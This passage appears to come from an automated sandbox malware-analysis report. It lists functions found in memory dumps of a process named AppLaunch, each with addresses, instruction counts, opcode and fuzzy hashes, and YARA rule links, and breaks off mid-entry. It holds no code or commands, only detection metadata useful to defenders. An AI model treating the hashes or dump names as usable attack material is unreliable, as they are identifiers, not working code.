Opcode ID: aaaf5efc3a67287a4ebafd43cec14187a21a37e0658412b0fccb67dbeb384f1a
Instruction ID: 7155958f0f612b78724742eb85aab8df15a3c93e29f538faafdc1a510c5f28bc
Opcode Fuzzy Hash: aaaf5efc3a67287a4ebafd43cec14187a21a37e0658412b0fccb67dbeb384f1a
Instruction Fuzzy Hash: B5415371A082548FDB28DBA8C004ABEBBF5EFC4214F1A846ED044EB751CB349C06CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 053E2FB0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b9400ea8e150d3b5612bbc36ee59acc7fc4f01b5185d18988812c18ed0ed3d
Instruction ID: e80f413e7a458933e98d8397a479c46f084c550cd81e19eb5ff3f28048044261
Opcode Fuzzy Hash: 98b9400ea8e150d3b5612bbc36ee59acc7fc4f01b5185d18988812c18ed0ed3d
Instruction Fuzzy Hash: 8851D774E01218DFCB18DFA9E98459DBBB2FF89305F10852DE815AB354DB355886CF50

Uniqueness

Uniqueness Score: -1.00%

Function 053EEC78 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7107f02fada98c3013b1bb44a450d1ca0a83edcd6a1344ed9c6040d54ab85c29
Instruction ID: 521473ec6c1d7fb3bf5c78e071c58f8df6f8bffc5d58697cbd522a489e7227dc
Opcode Fuzzy Hash: 7107f02fada98c3013b1bb44a450d1ca0a83edcd6a1344ed9c6040d54ab85c29
Instruction Fuzzy Hash: F941CD30B042148FCB18DBA8D859B7EBBF6EF89210F15817AD50ADB391DB758C45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2BED2 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92945fb3c1ba1f621db27df015c0069593c86f5f450416491e8f1726c64399cb
Instruction ID: b3575221117950559f9c4f00144333a2cbe446f4fb6c20bb0ebb181a6d02e73e
Opcode Fuzzy Hash: 92945fb3c1ba1f621db27df015c0069593c86f5f450416491e8f1726c64399cb
Instruction Fuzzy Hash: F151DD74E05328CFEB64DF64D944B9EBBB2AF8A300F1085EAD409A7251DB359E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2EAF0 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f1df714de7c6b6d1a84cf306cf0c5a3566030fb07d6f82cfffb3359f7bc1458
Instruction ID: 06844bbc629072292b0dfa8311e557c99188c2025175c008c9b1412dbf0a8af4
Opcode Fuzzy Hash: 5f1df714de7c6b6d1a84cf306cf0c5a3566030fb07d6f82cfffb3359f7bc1458
Instruction Fuzzy Hash: A6413435A04328DBEB64DF61D840B9ABBB3EF88304F1084A8C90967394DF355E89CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0AC29AEF Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9319401269056390b20a381ab4d262b4f7c99adffdd85a0e0153a18acfc0a27
Instruction ID: c6198b2cfa42f58163d66e892e475f1e16f10ceea770f059fa9a5126598d152d
Opcode Fuzzy Hash: a9319401269056390b20a381ab4d262b4f7c99adffdd85a0e0153a18acfc0a27
Instruction Fuzzy Hash: 54415B70A007199FDB14DFA9C49469DBBF1FF88310F15C669E809BB260EB70A985CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0AC23248 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89faff779bf36ec100ae7cce775ef6ab2a4bc537c74ddbd19ec751fec6a4e7a7
Instruction ID: 61802decb73580f4a638fe18d2cb0c95c2d5a53d7de35aa3db1d7d6637f8a8e8
Opcode Fuzzy Hash: 89faff779bf36ec100ae7cce775ef6ab2a4bc537c74ddbd19ec751fec6a4e7a7
Instruction Fuzzy Hash: 4E412730D102198FDB14EFA5D9446DDFBB2FF8A300F219129D815BB250EF306A86DB41

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2F480 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e53f4b805491f9420c8a8039401be0691809765d8d14ffed90617492ac2239
Instruction ID: a7acee2e8aae127fe1e5e7badacf7d1efb9e2106b95a40dcce8eef3c16b46e23
Opcode Fuzzy Hash: 37e53f4b805491f9420c8a8039401be0691809765d8d14ffed90617492ac2239
Instruction Fuzzy Hash: ED41F0B4E01318CFDB28DFA5D954A9DBBB2AF89300F20902ED409AB354EB355986CF41

Uniqueness

Uniqueness Score: -1.00%

Function 053E8D88 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3615d764f7e25ca3cbc06def999c5df098627563fb33408c22db43f3a6931745
Instruction ID: d1b761a9f25fd21b1f675fd0683d15d7a48705608a1a100049d448095f3499d2
Opcode Fuzzy Hash: 3615d764f7e25ca3cbc06def999c5df098627563fb33408c22db43f3a6931745
Instruction Fuzzy Hash: 4B314834B042188FD719DF68C499AAEBBF2EF89604F1545A8E9039B7A0CF799C41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 053EBAAA Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5966a0c58295a57f1be00d001353447b2f0d12f52872fa04412722f19219b2e9
Instruction ID: 97a5a87fa84723d5ea53ab47d50e0cade1a052fd83c73ec223e46f68ef8268c3
Opcode Fuzzy Hash: 5966a0c58295a57f1be00d001353447b2f0d12f52872fa04412722f19219b2e9
Instruction Fuzzy Hash: 68310F34B042259FDB05DBB8D864BBE7BF2EF85704F108469D101EB2D5DB788D458B91

Uniqueness

Uniqueness Score: -1.00%

Function 0AC290E8 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd8996a6b8bf3a138194ad54b25ed45eb2f1dea62bde6b40e4b7ff73f735d01
Instruction ID: 7c57df695d3eeda103be1f47ea4fca9dd2ecf7c4de771fe893a777ecfeedfc8c
Opcode Fuzzy Hash: 6bd8996a6b8bf3a138194ad54b25ed45eb2f1dea62bde6b40e4b7ff73f735d01
Instruction Fuzzy Hash: 553126B1D042598FDF14DFA9D988AEEBBF5BF88214F118429D406B7350DB789905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0AC25B3C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d37fbe664ac9354f4a51895d6cf5de03c7b9821efe5c48ab7c89bf12c309200
Instruction ID: b68c98ee897479e54ae6330841bab5c8e01d511a59055b5cdec9a1e2200a19e4
Opcode Fuzzy Hash: 8d37fbe664ac9354f4a51895d6cf5de03c7b9821efe5c48ab7c89bf12c309200
Instruction Fuzzy Hash: 6741EFB1D042189FDB20CFA9C584ADEBBB5EF48304F268129D509BB240D7756A4ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 0AC25F6C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87fe24ae9ff6a266e9b5f17560a2fa0693e652a335d3739323219052b76b3513
Instruction ID: 0fefabf973050a0d87f234481b9f5aea6984f4e4bab3b248adf66a2909bc599f
Opcode Fuzzy Hash: 87fe24ae9ff6a266e9b5f17560a2fa0693e652a335d3739323219052b76b3513
Instruction Fuzzy Hash: 5741EFB1D012598FDB20CFA9C584ADEBBB1EF48304F25852AD409BB250D7756A4ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2A74A Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45280383f3585406ed58b835702a07cb7a57f89bc7c940c5882ae23670839b3
Instruction ID: c5e814cf90aabf169ad4b04236d0dfa02501693b08c231f42ee26a998a5d90fa
Opcode Fuzzy Hash: c45280383f3585406ed58b835702a07cb7a57f89bc7c940c5882ae23670839b3
Instruction Fuzzy Hash: 4741F270E01218DFDB08EFB4D854AEEBBB2FF89300F108469E506A7290CB755945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0AC25B10 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97df64a28eaf552c144b9496a46770167f82ef449b58ffd2adc3a29ce75fab8b
Instruction ID: e7bc7363bdb51ebabb94cf9649668cebd4e5986215edf2ae07256c6c4049de0c
Opcode Fuzzy Hash: 97df64a28eaf552c144b9496a46770167f82ef449b58ffd2adc3a29ce75fab8b
Instruction Fuzzy Hash: 9B31D4B68083989FDB11CF59D854AEEBFF0FB1A210F06849AD451EB251C3389945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2A758 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70d204017519194ac8927d03290ad58da7e3b4da4138ac8ef13a1061f03cc3aa
Instruction ID: d0a6412bde2c63c200c86b83e358c5fec3c6cb8743eeb3ed1bcba51bfb517b06
Opcode Fuzzy Hash: 70d204017519194ac8927d03290ad58da7e3b4da4138ac8ef13a1061f03cc3aa
Instruction Fuzzy Hash: 0A31CE70E01218DFDB08EFB4D894AEEBBB2FF89300F108869E506A7290CB755945DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2223A Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae19d0f5461b3e7cf80f4d16d3fab759dfa7b62e72f55b5e2c7de50f4644af62
Instruction ID: 0922f67217dd2e01ffe0590cfd1f4d7d531174b08e928aea4f2b455cac33b36a
Opcode Fuzzy Hash: ae19d0f5461b3e7cf80f4d16d3fab759dfa7b62e72f55b5e2c7de50f4644af62
Instruction Fuzzy Hash: A641E475E01218DFDB18CFAAE9446DDBBF2BF88304F14916AD804A7354DB345A86CF10

Uniqueness

Uniqueness Score: -1.00%

Function 053EC217 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a0b5259f2bdd43b6a9fb8fc1ee52fa58a5f1648fec02064d08030768aabc16d
Instruction ID: a98a50b85bb14677b2beb918762966388202bce7b41121167b8cf04467add09f
Opcode Fuzzy Hash: 8a0b5259f2bdd43b6a9fb8fc1ee52fa58a5f1648fec02064d08030768aabc16d
Instruction Fuzzy Hash: F8317531E10B4ADACB10EFB8D8406D8B3B1EF99320F25972AE44977640EB70B5D5CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0AC29D0F Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b032bc4195ddcec2f538b22d6bdbccb5e25c33cf37db3731fcb58329deee6d9b
Instruction ID: e431d7e853b3245135189262cb3cb387d2ac4dc70dc52fd4765556699ea6843e
Opcode Fuzzy Hash: b032bc4195ddcec2f538b22d6bdbccb5e25c33cf37db3731fcb58329deee6d9b
Instruction Fuzzy Hash: 1E3123B0D05218DFDB28CFA9C498BEEBBF5EB48304F25846AD404AB350CB756845CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 053EC228 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df34195f063677eee1b5744f9fe7e33080657c6e5311a00f4c8fb640fa61ded7
Instruction ID: 9ae0b2245e8f29804106c8592e4c3709e86d18f4c75a5fdc6dc70e122c0171cf
Opcode Fuzzy Hash: df34195f063677eee1b5744f9fe7e33080657c6e5311a00f4c8fb640fa61ded7
Instruction Fuzzy Hash: B1316232D10B4ADACB10EFB9D800699B371EF99320F25872AE49977600EB70B5D4CB80

Uniqueness

Uniqueness Score: -1.00%

Function 053E6090 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a707eda4c78c780e36c8dceecc8483c81b05c35dc6e17e1be7946722951a90b
Instruction ID: 736aef9ba25f90c2c6b6e1e9062b82c419401ba3b7e4d603fcf7dbc9aee0ef8c
Opcode Fuzzy Hash: 3a707eda4c78c780e36c8dceecc8483c81b05c35dc6e17e1be7946722951a90b
Instruction Fuzzy Hash: 0B3119B9A00209EFCF02DFE4E8489ACBBB2FF4C310F059528E615A7261D7395994DF50

Uniqueness

Uniqueness Score: -1.00%

Function 053E9518 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18dc42db26b5719c717d08f0e6ba8a51f6ae3fbe95e4d30419dfbb2a8657f0ba
Instruction ID: 953cc443a916d59d1609881592a85ba2f4c3bef62995286fd9c3b6313789b9ca
Opcode Fuzzy Hash: 18dc42db26b5719c717d08f0e6ba8a51f6ae3fbe95e4d30419dfbb2a8657f0ba
Instruction Fuzzy Hash: 8F31B171E00716CFCF11DF78D8541AAB7F1FF85310B10862AC456A7681EB78A986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 099B0FB4 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.452914904.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_99b0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0a317644d35a49e4bd925c6e45d90bfd0c312235d75c84cfe92c2a9754aa807
Instruction ID: ab5d8fb7df1da4ab5922eeabe9bfcd228263de74acb84ab609b534292b7c6821
Opcode Fuzzy Hash: e0a317644d35a49e4bd925c6e45d90bfd0c312235d75c84cfe92c2a9754aa807
Instruction Fuzzy Hash: 10212430B082409FCB14CB68C9509AEBBBAFF89310B1481AAE555CB2A2CB75CC548B91

Uniqueness

Uniqueness Score: -1.00%

Function 0AC28948 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 569ab69d52b5cbfa8f0f321b0eb0007a91e77e364a2f9b4778b601560f6fe2b8
Instruction ID: db3ea70f7dfa580d85b0a6885f6824b172dfa781c68ed07035304495e4ed627a
Opcode Fuzzy Hash: 569ab69d52b5cbfa8f0f321b0eb0007a91e77e364a2f9b4778b601560f6fe2b8
Instruction Fuzzy Hash: F8312274D01218DFEF18DFA9E448AEDBBF2AF89310F11902AE405B3250DB705944CF64

Uniqueness

Uniqueness Score: -1.00%

Function 053EC5C0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a941e05794c10e1bb82d4abc45169deab7fe97871a1c6dff70ae5fe34178d301
Instruction ID: 0ce249de9c6d6312a72192ce8db7e548565877e37efa0831f3c299d82aa5d19c
Opcode Fuzzy Hash: a941e05794c10e1bb82d4abc45169deab7fe97871a1c6dff70ae5fe34178d301
Instruction Fuzzy Hash: 5321A8703092A98FC71A9738A02B77E3BEAAB42705B09652DE547C66C1DF6D8C41C752

Uniqueness

Uniqueness Score: -1.00%

Function 053E9528 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19e7bcdf8c501e012b2509aa80e0ca0f853b37b23b76db2af6f29c76d213141
Instruction ID: 3a1cd2eb44ca993713922fa11421ffe960cddcb462189e7148e6aa1887b32fb3
Opcode Fuzzy Hash: e19e7bcdf8c501e012b2509aa80e0ca0f853b37b23b76db2af6f29c76d213141
Instruction Fuzzy Hash: 6B318D71E00616CBCB11EFB9D4141AEB3F1FF85300B10862AC55AA7780EB75AA82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2F8A9 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a318d7c721d6da74af62e0b5f8cc9a8d62e50a296acc97cb0d44c39b20d18d4
Instruction ID: a231f108be74a8580a47a8f9e37fb8c5c9b5b8f5e3fcff1b417c4917e662e021
Opcode Fuzzy Hash: 2a318d7c721d6da74af62e0b5f8cc9a8d62e50a296acc97cb0d44c39b20d18d4
Instruction Fuzzy Hash: 9F31E178E01209DFCB04EFA9E590AEDBBF2EF88304F504429E805A7300DB30AA46CF51

Uniqueness

Uniqueness Score: -1.00%

Function 053EDE18 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db5e075695ac778b6f8f38c7ed29f8a6c20d4f8a9ab262d16d130bf886df3797
Instruction ID: ea021f9fbb5b78eb2f63fb1a8d4a867451e2503de799e7bb5f832317ab2ccecd
Opcode Fuzzy Hash: db5e075695ac778b6f8f38c7ed29f8a6c20d4f8a9ab262d16d130bf886df3797
Instruction Fuzzy Hash: 0E21C1383093809FCB129B749898B267BF2BFC2205F05487AD542CB692DF74DC0A8791

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2F8B8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a069d4717efaeccefd60b82068e0b879f0956c6fc9e7e8c35042ae542d6013f
Instruction ID: 9c43595c2f341fa17e0dac863c03ab0ae8d1b30aca977377fa0ebc78b3c92025
Opcode Fuzzy Hash: 4a069d4717efaeccefd60b82068e0b879f0956c6fc9e7e8c35042ae542d6013f
Instruction Fuzzy Hash: B431C078E01209DFCB44EFA9E594AEDBBF2EF88304F504429E805A7300EB306A46CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0AC25C98 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f42eeb001810e57517b42da1eb253616d5e209d25b9e109e9a1734cf2c3291
Instruction ID: 7afede2d715f2a6d077e1e1050a564e549282cd7b100c05d291bc2783408e974
Opcode Fuzzy Hash: a6f42eeb001810e57517b42da1eb253616d5e209d25b9e109e9a1734cf2c3291
Instruction Fuzzy Hash: 88213D31F042589FCB05DB69DC548EF7FB9EFC6314B15806AD504DB251DB319905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0AC29510 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b952407906cfa4d2f52dc688407545f2e243cee88c816aad7f1a76096deffe0
Instruction ID: 0ac357f5f1bb65997478e52768ef273349573a87b0f875ce8998196ebc72563f
Opcode Fuzzy Hash: 2b952407906cfa4d2f52dc688407545f2e243cee88c816aad7f1a76096deffe0
Instruction Fuzzy Hash: 3F31E0B0D01218DFEB20CF99C988BDEBBF4AB48314F15805AE414BB350C7B55945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2E990 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b040ce65c9f85243aecb9221750111c0c9d2c3aa06d59e53bbb298f72d420a4a
Instruction ID: 9aaf3b85cb4c092a09ec8c5009e6875da07e66724c58ebc4cd63c8c4b893d1c8
Opcode Fuzzy Hash: b040ce65c9f85243aecb9221750111c0c9d2c3aa06d59e53bbb298f72d420a4a
Instruction Fuzzy Hash: 1421F371E102198FDB08EFA8D9546EEBBF2EF89300F10946AD505B7390DB355A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 053E9000 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d92ca7b0f89cbd29bd2422cc6f9b0291dbe1075e06a2acc92a3e4f3a4960649
Instruction ID: a039a8b697baff2ddfde463ba484f938d6e24d50720de5082dc1f55c405054f6
Opcode Fuzzy Hash: 0d92ca7b0f89cbd29bd2422cc6f9b0291dbe1075e06a2acc92a3e4f3a4960649
Instruction Fuzzy Hash: B71134713193504FC71AA638545963E36E3AFC621970A85BAE502CBBC2DF3CCC068352

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2FC60 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27eb9b0f78273a5d03d1772f467ad5e86a104ef51577fb273de344310ad1014d
Instruction ID: 4fe165ba0cdb749bd3e9fa05b03e5ec53e0172cb2f1efa08710b6e0ca4f33259
Opcode Fuzzy Hash: 27eb9b0f78273a5d03d1772f467ad5e86a104ef51577fb273de344310ad1014d
Instruction Fuzzy Hash: 69118135B011189BEB149A69D95CAAEBBF6EF88304F25406DE905D7380DF308D15CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0AC29D00 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42d0a84123e5517eb178cb397462d35aeb0502069f3ceef0990e0328ec40fcd
Instruction ID: 6f66ab9d4a887f991b9301a943745bce4c8f28f6c2cb30af46f750688f02504a
Opcode Fuzzy Hash: d42d0a84123e5517eb178cb397462d35aeb0502069f3ceef0990e0328ec40fcd
Instruction Fuzzy Hash: A521FEB0901218EFEB24CFA9C858BDEBBF5BB49314F29805AE414AB250C7B55945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2A260 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f2f982bf06a735a86a13ec249cc82b1a760aef70f2832d9b02cd02593907baf
